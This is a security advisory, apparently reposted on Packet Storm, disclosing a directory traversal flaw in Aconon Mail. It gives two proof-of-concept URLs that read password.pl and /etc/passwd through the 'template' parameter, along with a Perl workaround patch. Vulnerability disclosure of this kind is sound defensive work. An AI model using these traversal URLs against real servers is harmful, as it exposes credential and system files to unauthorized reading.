Aconon Mail 2004 suffers from a remote directory traversal vulnerability.
930b4c49e651b2dd87e9aa6ea8aa58d1Application: aconon(R) Mail
Affected versions: probably all known, tested against 2007 Enterprise
SQL 11.7.0 and 2004 Enterprise SQL 11.5.1
Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...)
Exploitation: remote
Description: Aconon Mail is a commercial newsletter software, providing
a feature rich web interface for both, users and administrators. This
includes a public available archive of sent newsletters. Those archived
e-mails may be accessed through the web browser, processed by a template
engine. The used template may be overwritten by any user, modifying the
HTTP-GET "template" form parameter. This parameter is checked against
code injection, not against directory traversal though.
Proof of Concept:
http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C
vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C
Fix:
No fix has been published yet. However this workaround should patch the
issue:
Add in archiv.cgi below
$FORM{'template'} =~ s/\|//g;
this code:
use File::Basename;
$FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'})
: "";
if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) {
&error ("$TXT{'1501'}");
}
Status: the vendor has been informed.
German readers of the list may also read
http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/
P.S. greets to missi - you're great :o)
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!